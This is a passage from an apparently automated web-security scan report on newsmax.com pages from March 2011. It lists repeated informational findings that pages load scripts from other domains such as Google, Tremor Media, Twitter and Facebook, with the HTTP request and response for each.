The response dynamically includes the following scripts from other domains:

Request

GET /Slideshows HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,no-cache, must-revalidate
Pragma: no-cache
Content-Length: 45370
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 13:59:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.57. http://www.newsmax.com/TermsConditions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /TermsConditions

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /TermsConditions HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,no-cache, must-revalidate
Pragma: no-cache
Content-Length: 47377
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.58. http://www.newsmax.com/US/CalifCityWorker-Suicide/2011/03/19/id/390004  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /US/CalifCityWorker-Suicide/2011/03/19/id/390004

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /US/CalifCityWorker-Suicide/2011/03/19/id/390004 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 55997
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:07:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Answe
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.59. http://www.newsmax.com/US/CaliforniaStorm/2011/03/19/id/390007  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /US/CaliforniaStorm/2011/03/19/id/390007

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /US/CaliforniaStorm/2011/03/19/id/390007 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 53264
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:07:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   1 Dea
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.60. http://www.newsmax.com/US/Gender-NeutralBible/2011/03/17/id/389853  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /US/Gender-NeutralBible/2011/03/17/id/389853

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /US/Gender-NeutralBible/2011/03/17/id/389853 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 53418
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:06:44 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   New B
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.61. http://www.newsmax.com/US/Hit-and-RunFamily/2011/03/19/id/390016  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /US/Hit-and-RunFamily/2011/03/19/id/390016

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /US/Hit-and-RunFamily/2011/03/19/id/390016 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 55850
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:07:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Ark.
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.62. http://www.newsmax.com/US/IGDoDOverpaidJetFuelContractsby200M/2011/03/18/id/389942  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /US/IGDoDOverpaidJetFuelContractsby200M/2011/03/18/id/389942

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /US/IGDoDOverpaidJetFuelContractsby200M/2011/03/18/id/389942 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 53908
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:07:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   IG: D
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.63. http://www.newsmax.com/US/NationalChristmasTree/2011/03/19/id/390018  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /US/NationalChristmasTree/2011/03/19/id/390018

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /US/NationalChristmasTree/2011/03/19/id/390018 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 52994
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:07:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   New N
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.64. http://www.newsmax.com/US/PollAmericansMoreWorriedaboutEconomy/2011/03/18/id/389938  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /US/PollAmericansMoreWorriedaboutEconomy/2011/03/18/id/389938

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /US/PollAmericansMoreWorriedaboutEconomy/2011/03/18/id/389938 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 53348
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:07:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Poll:
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.65. http://www.newsmax.com/US/UCLAStudent-AsianRant/2011/03/19/id/390012  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /US/UCLAStudent-AsianRant/2011/03/19/id/390012

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /US/UCLAStudent-AsianRant/2011/03/19/id/390012 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 54962
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:07:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Stude
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.66. http://www.newsmax.com/US/US-Russia/2011/03/19/id/390008  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /US/US-Russia/2011/03/19/id/390008

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /US/US-Russia/2011/03/19/id/390008 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 53200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:07:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Penta
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.67. http://www.newsmax.com/advertise  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /advertise

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /advertise HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,no-cache, must-revalidate
Pragma: no-cache
Content-Length: 28054
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 13:59:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.68. http://www.newsmax.com/archives  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /archives

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /archives HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,no-cache, must-revalidate
Pragma: no-cache
Content-Length: 38383
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 13:59:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.69. http://www.newsmax.com/blogs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /blogs

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 82576
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 13:59:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.70. http://www.newsmax.com/blogs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /blogs/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/ HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 82576
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:09:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.71. http://www.newsmax.com/blogs/AndreaTantaros/id-35  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /blogs/AndreaTantaros/id-35

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/AndreaTantaros/id-35 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 44220
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:09:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.72. http://www.newsmax.com/blogs/Estrich/id-38  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /blogs/Estrich/id-38

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/Estrich/id-38 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
